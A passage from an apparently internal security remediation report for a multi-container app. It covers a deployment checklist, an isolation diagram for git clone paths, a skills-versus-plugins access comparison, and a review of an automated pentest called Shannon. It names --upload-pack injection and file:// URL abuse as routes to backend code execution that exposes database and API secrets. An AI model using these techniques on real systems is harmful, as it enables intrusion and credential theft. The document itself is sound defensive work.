
Re-run Shannon with authenticated test credentials. Provide:

2 test accounts in different workspaces (for IDOR testing)
1 admin account (for vertical escalation testing)
1 regular user account (for privilege escalation testing)

5. Deployment Checklist

Pre-Deploy (Environment Config)

Set CLERK_AUDIENCE in all environments (Railway, staging, prod)
Verify DATABASE_URL includes sslmode=require in production
Verify REDIS_PASSWORD is set and strong (not the dev default)
Rotate ORCHESTRATOR_API_KEY (treat current value as potentially leaked)
Remove [email protected] from Clerk users (Shannon created this during testing)

Deploy Order

FIX-01 (git sanitizer) — Ship first, blocks RCE
FIX-02 (frontend auto-admin removal) — Quick frontend deploy
FIX-03 (JWT audience) — Config change + code
FIX-04 (NL2SQL hardening) — Backend deploy
FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window
FIX-06 (audit service) — Backend deploy
FIX-07 through FIX-09 — Iterative hardening

Post-Deploy Verification

Attempt --upload-pack injection on skills import → expect 400
Attempt file:// URL on codegraph index → expect 400
Verify admin endpoints return 403 for non-admin Clerk users
Verify NL2SQL rejects RETURNING keyword
Confirm audit logs are being written for git_clone events
Schedule Shannon re-test with authenticated credentials

6. Architecture Context: Why Each Path Has Different Risk

Understanding the isolation model changes the severity assessment:

┌─────────────────────────────────────────────────────────────────┐
│                    BACKEND CONTAINER (FastAPI)                    │
│                                                                   │
│  Path A: skill_loader._git_clone()                               │
│    └─ subprocess.run("git clone ...") ← RUNS ON BACKEND SERVER  │
│    └─ ANY user can trigger ← NO ADMIN CHECK                     │
│    └─ Skills auto-activate globally ← NO APPROVAL               │
│    └─ BLAST RADIUS: Full backend server (DB creds, API keys)    │
│                                                                   │
│  Path B: codegraph Repo.clone_from()                             │
│    └─ GitPython clone ← RUNS ON BACKEND SERVER                  │
│    └─ ANY user can trigger ← NO ADMIN CHECK                     │
│    └─ Temp dir, cleaned up after indexing                        │
│    └─ BLAST RADIUS: Full backend server                         │
│                                                                   │
│  Plugin import: harvest_plugins.clone_repo()                     │
│    └─ subprocess.run("git clone ...") ← RUNS ON BACKEND SERVER  │
│    └─ ADMIN ONLY ← _assert_admin() ✅                           │
│    └─ Full security scan + approval ✅                           │
│    └─ BLAST RADIUS: Full backend server (but admin-gated)       │
│                                                                   │
└─────────────┬───────────────────────────────────────────────────┘
              │ Redis queue
              ▼
┌─────────────────────────────────────────────────────────────────┐
│              WORKSPACE-WORKER CONTAINER (separate)               │
│                                                                   │
│  Path C: executor._git_clone()                                   │
│    └─ git clone in sandbox ← RUNS IN WORKER CONTAINER           │
│    └─ Workspace-scoped filesystem (/workspaces/{ws_id}/)        │
│    └─ Command whitelist (no sudo, su, mount)                     │
│    └─ Sandboxed env (no inherited PATH or secrets)              │
│    └─ 5GB quota per workspace                                    │
│    └─ URL validated by Pydantic (HTTPS + allowed hosts)         │
│    └─ BLAST RADIUS: Worker container only (no DB creds)         │
│                                                                   │
└─────────────────────────────────────────────────────────────────┘

Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.

Skills vs. Plugins: The Access Control Gap

| Aspect | Skills (PRD-22) | Plugins (PRD-42) |
|---|---|---|
| Import endpoint | POST /api/v1/skills/sources/git | POST /api/admin/plugins/import-github |
| Auth requirement | Any authenticated user | Admin only (_assert_admin()) |
| Security scan | Basic pattern matching (8 patterns) | Full static + LLM-based scan |
| Approval workflow | None — auto-activated | Admin approval required |
| Activation scope | Global (all workspaces) | Per-workspace enablement |
| Assignment | Direct to any agent | Via AgentAssignedPlugin |

The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and removes the chain from any authenticated user to RCE. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.

7. Shannon Assessment Quality Notes

Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:

Strengths:

Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)
Thorough injection analysis — identified every git clone code path
Good methodology — proof-by-exploitation focus, no assumptions
Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)

Limitations:

Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)
Overcounted authorization issues (21) that were actually properly implemented in the backend
Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries
Auto-admin finding was based on frontend code only — didn't verify backend enforcement

Recommendation: Next Shannon run should:

Be given read access to the actual orchestrator/ Python source
Be provided authenticated test credentials (bypass waitlist)
Run an internal-scope test focused on the 21 authz items that couldn't be tested externally
